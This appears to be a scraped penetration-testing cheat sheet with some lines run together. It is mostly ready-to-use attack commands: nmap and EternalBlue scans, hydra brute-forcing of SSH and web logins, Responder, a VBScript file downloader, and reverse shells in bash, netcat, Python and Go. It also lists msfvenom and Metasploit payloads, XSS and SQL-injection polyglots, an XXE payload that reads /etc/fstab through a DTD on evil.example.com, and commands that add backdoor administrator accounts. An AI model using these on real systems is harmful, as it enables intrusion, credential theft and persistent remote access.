Assumes there's an ips.txt file with the IPs to target.
nmap -v1 -A -T4 -p- -sS -oA full_tcp -iL ips.txtnmap -v1 -A -T4 -p- -sS -sU -oA full_tcp_udp -iL ips.txtnmap -v1 -A -sU --top-ports 1000 -oA common_udp -iL ips.txt
nmap -v1 -sS -Pn -p 21,22,23,25,53,80,111,135,137,138,139,161,389,443,445,873,1099,1194,1433,1434,2049,2082,2083,2376,2780,3260,3306,3389,5060,5061,5432,5500,5984,6379,8000,8080,8081,8200,8888,8098,9000,9050,9090,9091,9143,10099,10199,10443,9160,9443,8443,10000,11211,20000,27000,27001,27018,27019,27017,28017,60893 --open -oA common_tcp -iL ips.txtnmap -v1 -p 139,445 --open --script smb-vuln-ms17-010 -oA smb_eternal_blue -iL ips.txtnmap --script smtp-enum-users.nse -p 25,465,587 -iL ips.txtnmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020 -iL ips.txthost -t ns megacorpone.com
host -t mx megacorpone.comsmbclient -L <ip> -U <user> -I //<ip> <password>Usage: cscript wget.vbs http://<ip>/<file.exe> <file.exe>
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http is Nothing then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http is Nothing then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http is Nothing then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.close >> wget.vbscat <ips_file> | xargs -n1 -i enum4linux -S -w <domain> -u <user> -p <pass> {}apt install nfs-common
mount -t nfs <ip>:/<path> /mnt/ -nolock
git clone https://github.com/lgandx/Responder.git
python Responder.py -I eth0 -rPvTest with a wordlist as password
hydra -V -L <users_list> -P <passwords_list> <ip> ssh -o hydra-ssh-attack.txtTry all 4 digits combination of lowercase, uppercase and numbers
hydra -V -l <username> -x 4:4:aA1 <ip> ssh -o hydra-ssh-attack.txtListen for a reverse shell
nc -l -p 9999 -vvvFrom the internal machine, initiate the reverse shell
ssh -f -N -T -R 2200:localhost:22 user@public_hostFrom the public host access the reversed shell that's forwarded on 2200
ssh -p 2200 user@localhostnc -lv 4444bash -i >& /dev/tcp/<ip>/4444 0>&1nc -e /bin/sh <ip> 4444python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go && go run /tmp/sh.gomsfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f pythonmsf > use multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcpdocker run --rm -i -t -p 9990-9999:9990-9999 -v /home/root/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data --name msf metasploitframework/metasploit-frameworkhydra <ip> http-form-post "<local_uri>:user=^USER^&pass=^PASS^:<error_msg>" -L <users.txt> -P <pass.txt> -t 20 -w 30 -o hydra-http-post-attack.txtjaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3eSLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample
Payload
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///etc/fstab">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil.example.com/combine.dtd">
%dtd;
]>
<roottag>&all;</roottag>
combine.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY all "%start;%goodies;%end;">
rsync -azvP <source>/ <dest>Python 2
python -m SimpleHTTPServer 80Python3
python3 -m http.server 80
On the local machine
ssh -D 1337 -q -C -N <host>
Directory size
du -sh directory_nametar -zcvf {.tgz-file} {files}Add a new user with sudo
useradd -G sudo -d /home/<user> -m <user>
passwd <user>Add sudo to an existing user
usermod -a -G sudo <user>Add a new user
net user <username> <password> /ADD
Make him admin
net localgroup administrators <username> /add